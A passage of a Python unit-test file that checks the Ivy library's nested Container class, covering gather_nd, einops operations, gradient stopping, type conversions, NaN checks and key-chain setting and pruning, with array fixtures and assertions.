assert "a" not in container_gathered
assert np.allclose(ivy.to_numpy(container_gathered["b"]["c"]), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert "b/d" not in container_gathered
def test_container_gather_nd(device, call):
dict_in = {
"a": ivy.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]], device=device),
"b": {
"c": ivy.array([[[8, 7], [6, 5]], [[4, 3], [2, 1]]], device=device),
"d": ivy.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_gathered = container.gather_nd(ivy.array([[0, 1], [1, 0]], device=device))
assert np.allclose(
ivy.to_numpy(container_gathered["a"]), np.array([[3, 4], [5, 6]])
)
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["d"]), np.array([[6, 8], [10, 12]])
)
assert np.allclose(
ivy.to_numpy(container_gathered.b.d), np.array([[6, 8], [10, 12]])
)
# with key_chains to apply
container_gathered = container.gather_nd(
ivy.array([[0, 1], [1, 0]], device=device), ["a", "b/c"]
)
assert np.allclose(
ivy.to_numpy(container_gathered["a"]), np.array([[3, 4], [5, 6]])
)
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["d"]),
np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
)
assert np.allclose(
ivy.to_numpy(container_gathered.b.d),
np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
)
# with key_chains to apply pruned
container_gathered = container.gather_nd(
ivy.array([[0, 1], [1, 0]], device=device), ["a", "b/c"], prune_unapplied=True
)
assert np.allclose(
ivy.to_numpy(container_gathered["a"]), np.array([[3, 4], [5, 6]])
)
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert "b/d" not in container_gathered
# with key_chains to not apply
container_gathered = container.gather_nd(
ivy.array([[0, 1], [1, 0]], device=device),
Container({"a": None, "b": {"d": None}}),
to_apply=False,
)
assert np.allclose(
ivy.to_numpy(container_gathered["a"]),
np.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]]),
)
assert np.allclose(
ivy.to_numpy(container_gathered.a),
np.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]]),
)
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["d"]),
np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
)
assert np.allclose(
ivy.to_numpy(container_gathered.b.d),
np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
)
# with key_chains to not apply pruned
container_gathered = container.gather_nd(
ivy.array([[0, 1], [1, 0]], device=device),
Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
)
assert "a" not in container_gathered
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert "b/d" not in container_gathered
def test_container_einops_rearrange(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
container_rearranged = container.einops_rearrange("b n -> n b")
assert np.allclose(
ivy.to_numpy(container_rearranged["a"]), np.array([[0.0], [1.0], [2.0], [3.0]])
)
assert np.allclose(
ivy.to_numpy(container_rearranged.a), np.array([[0.0], [1.0], [2.0], [3.0]])
)
assert np.allclose(
ivy.to_numpy(container_rearranged["b"]["c"]),
np.array([[5.0], [10.0], [15.0], [20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_rearranged.b.c),
np.array([[5.0], [10.0], [15.0], [20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_rearranged["b"]["d"]),
np.array([[10.0], [9.0], [8.0], [7.0]]),
)
assert np.allclose(
ivy.to_numpy(container_rearranged.b.d), np.array([[10.0], [9.0], [8.0], [7.0]])
)
def test_container_einops_reduce(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
container_reduced = container.einops_reduce("b n -> b", "mean")
assert np.allclose(ivy.to_numpy(container_reduced["a"]), np.array([1.5]))
assert np.allclose(ivy.to_numpy(container_reduced.a), np.array([1.5]))
assert np.allclose(ivy.to_numpy(container_reduced["b"]["c"]), np.array([12.5]))
assert np.allclose(ivy.to_numpy(container_reduced.b.c), np.array([12.5]))
assert np.allclose(ivy.to_numpy(container_reduced["b"]["d"]), np.array([8.5]))
assert np.allclose(ivy.to_numpy(container_reduced.b.d), np.array([8.5]))
def test_container_einops_repeat(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
container_repeated = container.einops_repeat("b n -> b n c", c=2)
assert np.allclose(
ivy.to_numpy(container_repeated["a"]),
np.array([[[0.0, 0.0], [1.0, 1.0], [2.0, 2.0], [3.0, 3.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.a),
np.array([[[0.0, 0.0], [1.0, 1.0], [2.0, 2.0], [3.0, 3.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated["b"]["c"]),
np.array([[[5.0, 5.0], [10.0, 10.0], [15.0, 15.0], [20.0, 20.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.b.c),
np.array([[[5.0, 5.0], [10.0, 10.0], [15.0, 15.0], [20.0, 20.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated["b"]["d"]),
np.array([[[10.0, 10.0], [9.0, 9.0], [8.0, 8.0], [7.0, 7.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.b.d),
np.array([[[10.0, 10.0], [9.0, 9.0], [8.0, 8.0], [7.0, 7.0]]]),
)
def test_container_to_dev(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
container_to_cpu = container.to_dev(device)
assert ivy.dev(container_to_cpu["a"]) == device
assert ivy.dev(container_to_cpu.a) == device
assert ivy.dev(container_to_cpu["b"]["c"]) == device
assert ivy.dev(container_to_cpu.b.c) == device
assert ivy.dev(container_to_cpu["b"]["d"]) == device
assert ivy.dev(container_to_cpu.b.d) == device
def test_container_stop_gradients(device, call):
dict_in = {
"a": ivy.variable(
ivy.array(
[[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
)
),
"b": {
"c": ivy.variable(
ivy.array(
[[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
)
),
"d": ivy.variable(
ivy.array(
[[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]],
device=device,
)
),
},
}
container = Container(dict_in)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container["a"])
assert ivy.is_variable(container.a)
assert ivy.is_variable(container["b"]["c"])
assert ivy.is_variable(container.b.c)
assert ivy.is_variable(container["b"]["d"])
assert ivy.is_variable(container.b.d)
# without key_chains specification
container_stopped_grads = container.stop_gradients()
assert ivy.is_ivy_array(container_stopped_grads["a"])
assert ivy.is_ivy_array(container_stopped_grads.a)
assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
assert ivy.is_ivy_array(container_stopped_grads.b.c)
assert ivy.is_ivy_array(container_stopped_grads["b"]["d"])
assert ivy.is_ivy_array(container_stopped_grads.b.d)
# with key_chains to apply
container_stopped_grads = container.stop_gradients(key_chains=["a", "b/c"])
assert ivy.is_ivy_array(container_stopped_grads["a"])
assert ivy.is_ivy_array(container_stopped_grads.a)
assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
assert ivy.is_ivy_array(container_stopped_grads.b.c)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container_stopped_grads["b"]["d"])
assert ivy.is_variable(container_stopped_grads.b.d)
# with key_chains to apply pruned
container_stopped_grads = container.stop_gradients(
key_chains=["a", "b/c"], prune_unapplied=True
)
assert ivy.is_ivy_array(container_stopped_grads["a"])
assert ivy.is_ivy_array(container_stopped_grads.a)
assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
assert ivy.is_ivy_array(container_stopped_grads.b.c)
assert "b/d" not in container_stopped_grads
# with key_chains to not apply
container_stopped_grads = container.stop_gradients(
key_chains=Container({"a": None, "b": {"d": None}}), to_apply=False
)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container_stopped_grads["a"])
assert ivy.is_variable(container_stopped_grads.a)
assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
assert ivy.is_ivy_array(container_stopped_grads.b.c)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container_stopped_grads["b"]["d"])
assert ivy.is_variable(container_stopped_grads.b.d)
# with key_chains to not apply pruned
container_stopped_grads = container.stop_gradients(
key_chains=Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
)
assert "a" not in container_stopped_grads
assert ivy.is_ivy_array(container_stopped_grads["b"]["c"])
assert ivy.is_ivy_array(container_stopped_grads.b.c)
assert "b/d" not in container_stopped_grads
def test_container_as_variables(device, call):
dict_in = {
"a": ivy.array(
[[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
),
"b": {
"c": ivy.array(
[[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
),
"d": ivy.array(
[[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]], device=device
),
},
}
container = Container(dict_in)
assert ivy.is_ivy_array(container["a"])
assert ivy.is_ivy_array(container.a)
assert ivy.is_ivy_array(container["b"]["c"])
assert ivy.is_ivy_array(container.b.c)
assert ivy.is_ivy_array(container["b"]["d"])
assert ivy.is_ivy_array(container.b.d)
variable_cont = container.as_variables()
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(variable_cont["a"])
assert ivy.is_variable(variable_cont.a)
assert ivy.is_variable(variable_cont["b"]["c"])
assert ivy.is_variable(variable_cont.b.c)
assert ivy.is_variable(variable_cont["b"]["d"])
assert ivy.is_variable(variable_cont.b.d)
def test_container_as_arrays(device, call):
dict_in = {
"a": ivy.variable(
ivy.array(
[[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
)
),
"b": {
"c": ivy.variable(
ivy.array(
[[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
)
),
"d": ivy.variable(
ivy.array(
[[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]],
device=device,
)
),
},
}
container = Container(dict_in)
if call is not helpers.np_call:
# Numpy does not support variables or gradients
assert ivy.is_variable(container["a"])
assert ivy.is_variable(container.a)
assert ivy.is_variable(container["b"]["c"])
assert ivy.is_variable(container.b.c)
assert ivy.is_variable(container["b"]["d"])
assert ivy.is_variable(container.b.d)
# without key_chains specification
container_as_arrays = container.as_arrays()
assert ivy.is_ivy_array(container_as_arrays["a"])
assert ivy.is_ivy_array(container_as_arrays.a)
assert ivy.is_ivy_array(container_as_arrays["b"]["c"])
assert ivy.is_ivy_array(container_as_arrays.b.c)
assert ivy.is_ivy_array(container_as_arrays["b"]["d"])
assert ivy.is_ivy_array(container_as_arrays.b.d)
def test_container_num_arrays(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
assert container.num_arrays() == 3
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.variable(ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device)),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
assert (
container.num_arrays() == 3
if call in [helpers.np_call, helpers.jnp_call]
else 2
)
def test_container_size_ordered_arrays(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0]], device=device),
},
}
container = Container(dict_in)
size_ordered = container.size_ordered_arrays()
assert np.allclose(ivy.to_numpy(size_ordered.a), np.array([[0.0, 1.0, 2.0, 3.0]]))
assert np.allclose(ivy.to_numpy(size_ordered.b__c), np.array([[5.0, 10.0]]))
assert np.allclose(ivy.to_numpy(size_ordered.b__d), np.array([[10.0, 9.0, 8.0]]))
for v, arr in zip(
size_ordered.values(),
[
np.array([[5.0, 10.0]]),
np.array([[10.0, 9.0, 8.0]]),
np.array([[0.0, 1.0, 2.0, 3.0]]),
],
):
assert np.allclose(ivy.to_numpy(v), arr)
def test_container_to_numpy(device, call):
dict_in = {
"a": ivy.variable(
ivy.array(
[[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
)
),
"b": {
"c": ivy.variable(
ivy.array(
[[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
)
),
"d": ivy.variable(
ivy.array(
[[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]],
device=device,
)
),
},
}
container = Container(dict_in)
# before conversion
assert ivy.is_ivy_array(container["a"])
assert ivy.is_ivy_array(container.a)
assert ivy.is_ivy_array(container["b"]["c"])
assert ivy.is_ivy_array(container.b.c)
assert ivy.is_ivy_array(container["b"]["d"])
assert ivy.is_ivy_array(container.b.d)
# after conversion
container_to_numpy = container.to_numpy()
assert isinstance(container_to_numpy["a"], np.ndarray)
assert isinstance(container_to_numpy.a, np.ndarray)
assert isinstance(container_to_numpy["b"]["c"], np.ndarray)
assert isinstance(container_to_numpy.b.c, np.ndarray)
assert isinstance(container_to_numpy["b"]["d"], np.ndarray)
assert isinstance(container_to_numpy.b.d, np.ndarray)
def test_container_from_numpy(device, call):
dict_in = {
"a": np.array([[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]]),
"b": {
"c": np.array([[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]]),
"d": np.array([[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]]),
},
}
# before conversion
container = Container(dict_in)
assert isinstance(container["a"], np.ndarray)
assert isinstance(container.a, np.ndarray)
assert isinstance(container["b"]["c"], np.ndarray)
assert isinstance(container.b.c, np.ndarray)
assert isinstance(container["b"]["d"], np.ndarray)
assert isinstance(container.b.d, np.ndarray)
# after conversion
container_from_numpy = container.from_numpy()
assert ivy.is_ivy_array(container_from_numpy["a"])
assert ivy.is_ivy_array(container_from_numpy.a)
assert ivy.is_ivy_array(container_from_numpy["b"]["c"])
assert ivy.is_ivy_array(container_from_numpy.b.c)
assert ivy.is_ivy_array(container_from_numpy["b"]["d"])
assert ivy.is_ivy_array(container_from_numpy.b.d)
def test_container_arrays_as_lists(device, call):
dict_in = {
"a": ivy.array(
[[[1.0, 2.0], [3.0, 4.0]], [[5.0, 6.0], [7.0, 8.0]]], device=device
),
"b": {
"c": ivy.array(
[[[8.0, 7.0], [6.0, 5.0]], [[4.0, 3.0], [2.0, 1.0]]], device=device
),
"d": ivy.array(
[[[2.0, 4.0], [6.0, 8.0]], [[10.0, 12.0], [14.0, 16.0]]], device=device
),
},
}
container = Container(dict_in)
assert ivy.is_ivy_array(container["a"])
assert ivy.is_ivy_array(container.a)
assert ivy.is_ivy_array(container["b"]["c"])
assert ivy.is_ivy_array(container.b.c)
assert ivy.is_ivy_array(container["b"]["d"])
assert ivy.is_ivy_array(container.b.d)
# without key_chains specification
container_arrays_as_lists = container.arrays_as_lists()
assert isinstance(container_arrays_as_lists["a"], list)
assert isinstance(container_arrays_as_lists.a, list)
assert isinstance(container_arrays_as_lists["b"]["c"], list)
assert isinstance(container_arrays_as_lists.b.c, list)
assert isinstance(container_arrays_as_lists["b"]["d"], list)
assert isinstance(container_arrays_as_lists.b.d, list)
def test_container_has_key(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
assert container.has_key("a") # noqa
assert container.has_key("b") # noqa
assert container.has_key("c") # noqa
assert container.has_key("d") # noqa
assert not container.has_key("e") # noqa
assert not container.has_key("f") # noqa
def test_container_has_key_chain(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
assert container.has_key_chain("a")
assert container.has_key_chain("b")
assert container.has_key_chain("b/c")
assert container.has_key_chain("b/d")
assert not container.has_key_chain("b/e")
assert not container.has_key_chain("c")
def test_container_has_nans(device, call):
container = Container(
{
"a": ivy.array([1.0, 2.0], device=device),
"b": {
"c": ivy.array([2.0, 3.0], device=device),
"d": ivy.array([3.0, 4.0], device=device),
},
}
)
container_nan = Container(
{
"a": ivy.array([1.0, 2.0], device=device),
"b": {
"c": ivy.array([float("nan"), 3.0], device=device),
"d": ivy.array([3.0, 4.0], device=device),
},
}
)
container_inf = Container(
{
"a": ivy.array([1.0, 2.0], device=device),
"b": {
"c": ivy.array([2.0, 3.0], device=device),
"d": ivy.array([3.0, float("inf")], device=device),
},
}
)
container_nan_n_inf = Container(
{
"a": ivy.array([1.0, 2.0], device=device),
"b": {
"c": ivy.array([float("nan"), 3.0], device=device),
"d": ivy.array([3.0, float("inf")], device=device),
},
}
)
# global
# with inf check
assert not container.has_nans()
assert container_nan.has_nans()
assert container_inf.has_nans()
assert container_nan_n_inf.has_nans()
# without inf check
assert not container.has_nans(include_infs=False)
assert container_nan.has_nans(include_infs=False)
assert not container_inf.has_nans(include_infs=False)
assert container_nan_n_inf.has_nans(include_infs=False)
# leafwise
# with inf check
container_hn = container.has_nans(leafwise=True)
assert container_hn.a is False
assert container_hn.b.c is False
assert container_hn.b.d is False
container_nan_hn = container_nan.has_nans(leafwise=True)
assert container_nan_hn.a is False
assert container_nan_hn.b.c is True
assert container_nan_hn.b.d is False
container_inf_hn = container_inf.has_nans(leafwise=True)
assert container_inf_hn.a is False
assert container_inf_hn.b.c is False
assert container_inf_hn.b.d is True
container_nan_n_inf_hn = container_nan_n_inf.has_nans(leafwise=True)
assert container_nan_n_inf_hn.a is False
assert container_nan_n_inf_hn.b.c is True
assert container_nan_n_inf_hn.b.d is True
# without inf check
container_hn = container.has_nans(leafwise=True, include_infs=False)
assert container_hn.a is False
assert container_hn.b.c is False
assert container_hn.b.d is False
container_nan_hn = container_nan.has_nans(leafwise=True, include_infs=False)
assert container_nan_hn.a is False
assert container_nan_hn.b.c is True
assert container_nan_hn.b.d is False
container_inf_hn = container_inf.has_nans(leafwise=True, include_infs=False)
assert container_inf_hn.a is False
assert container_inf_hn.b.c is False
assert container_inf_hn.b.d is False
container_nan_n_inf_hn = container_nan_n_inf.has_nans(
leafwise=True, include_infs=False
)
assert container_nan_n_inf_hn.a is False
assert container_nan_n_inf_hn.b.c is True
assert container_nan_n_inf_hn.b.d is False
def test_container_at_keys(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
new_container = container.at_keys(["a", "c"])
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert "d" not in new_container["b"]
new_container = container.at_keys("c")
assert "a" not in new_container
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert "d" not in new_container["b"]
new_container = container.at_keys(["b"])
assert "a" not in new_container
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([3]))
def test_container_at_key_chain(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
# explicit function call
sub_container = container.at_key_chain("b")
assert np.allclose(ivy.to_numpy(sub_container["c"]), np.array([2]))
sub_container = container.at_key_chain("b/c")
assert np.allclose(ivy.to_numpy(sub_container), np.array([2]))
# overridden built-in function call
sub_container = container["b"]
assert np.allclose(ivy.to_numpy(sub_container["c"]), np.array([2]))
sub_container = container["b/c"]
assert np.allclose(ivy.to_numpy(sub_container), np.array([2]))
def test_container_at_key_chains(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
target_cont = Container({"a": True, "b": {"c": True}})
new_container = container.at_key_chains(target_cont)
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert "d" not in new_container["b"]
new_container = container.at_key_chains(["b/c", "b/d"])
assert "a" not in new_container
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([3]))
new_container = container.at_key_chains("b/c")
assert "a" not in new_container
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert "d" not in new_container["b"]
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_all_key_chains(include_empty, device, call):
a_val = Container() if include_empty else ivy.array([1], device=device)
bc_val = Container() if include_empty else ivy.array([2], device=device)
bd_val = Container() if include_empty else ivy.array([3], device=device)
dict_in = {"a": a_val, "b": {"c": bc_val, "d": bd_val}}
container = Container(dict_in)
kcs = container.all_key_chains(include_empty)
assert kcs[0] == "a"
assert kcs[1] == "b/c"
assert kcs[2] == "b/d"
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_key_chains_containing(include_empty, device, call):
a_val = Container() if include_empty else ivy.array([1], device=device)
bc_val = Container() if include_empty else ivy.array([2], device=device)
bd_val = Container() if include_empty else ivy.array([3], device=device)
dict_in = {"a_sub": a_val, "b": {"c": bc_val, "d_sub": bd_val}}
container = Container(dict_in)
kcs = container.key_chains_containing("sub", include_empty)
assert kcs[0] == "a_sub"
assert kcs[1] == "b/d_sub"
# noinspection PyUnresolvedReferences
def test_container_set_at_keys(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container_orig = Container(dict_in)
# explicit function call
orig_container = container_orig.copy()
container = orig_container.set_at_keys({"b": ivy.array([4], device=device)})
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]), np.array([4]))
assert not container.has_key("c") # noqa
assert not container.has_key("d") # noqa
container = orig_container.set_at_keys(
{"a": ivy.array([5], device=device), "c": ivy.array([6], device=device)}
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([5]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([6]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
# noinspection PyUnresolvedReferences
def test_container_set_at_key_chain(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container_orig = Container(dict_in)
# explicit function call
container = container_orig.copy()
container = container.set_at_key_chain("b/e", ivy.array([4], device=device))
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["e"]), np.array([4]))
container = container.set_at_key_chain("f", ivy.array([5], device=device))
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["e"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container["f"]), np.array([5]))
# overridden built-in function call
container = container_orig.copy()
assert "b/e" not in container
container["b/e"] = ivy.array([4], device=device)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["e"]), np.array([4]))
assert "f" not in container
container["f"] = ivy.array([5], device=device)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container["b"]["e"]), np.array([4]))
assert np.allclose(ivy.to_numpy(container["f"]), np.array([5]))
# noinspection PyUnresolvedReferences
def test_container_overwrite_at_key_chain(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container_orig = Container(dict_in)
# explicit function call
container = container_orig.copy()
# noinspection PyBroadException
try:
container.overwrite_at_key_chain("b/e", ivy.array([4], device=device))
exception_raised = False
except Exception:
exception_raised = True
assert exception_raised
container = container.overwrite_at_key_chain("b/d", ivy.array([4], device=device))
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([4]))
def test_container_set_at_key_chains(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
target_container = Container(
{"a": ivy.array([4], device=device), "b": {"d": ivy.array([5], device=device)}}
)
new_container = container.set_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([4]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([5]))
target_container = Container({"b": {"c": ivy.array([7], device=device)}})
new_container = container.set_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([7]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([3]))
def test_container_overwrite_at_key_chains(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
target_container = Container(
{"a": ivy.array([4], device=device), "b": {"d": ivy.array([5], device=device)}}
)
new_container = container.overwrite_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([4]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([5]))
target_container = Container({"b": {"c": ivy.array([7], device=device)}})
new_container = container.overwrite_at_key_chains(target_container, inplace=False)
assert np.allclose(ivy.to_numpy(new_container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(new_container["b"]["c"]), np.array([7]))
assert np.allclose(ivy.to_numpy(new_container["b"]["d"]), np.array([3]))
# noinspection PyBroadException
try:
container.overwrite_at_key_chains(
Container({"b": {"e": ivy.array([5], device=device)}})
)
exception_raised = False
except Exception:
exception_raised = True
assert exception_raised
def test_container_prune_keys(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_pruned = container.prune_keys(["a", "c"])
assert "a" not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned["b"]["d"]), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert "c" not in container_pruned["b"]
def _test_a_exception(container_in):
try:
_ = container_in.a
return False
except AttributeError:
return True
def _test_bc_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
def _test_bd_exception(container_in):
try:
_ = container_in.b.d
return False
except AttributeError:
return True
assert _test_a_exception(container_pruned)
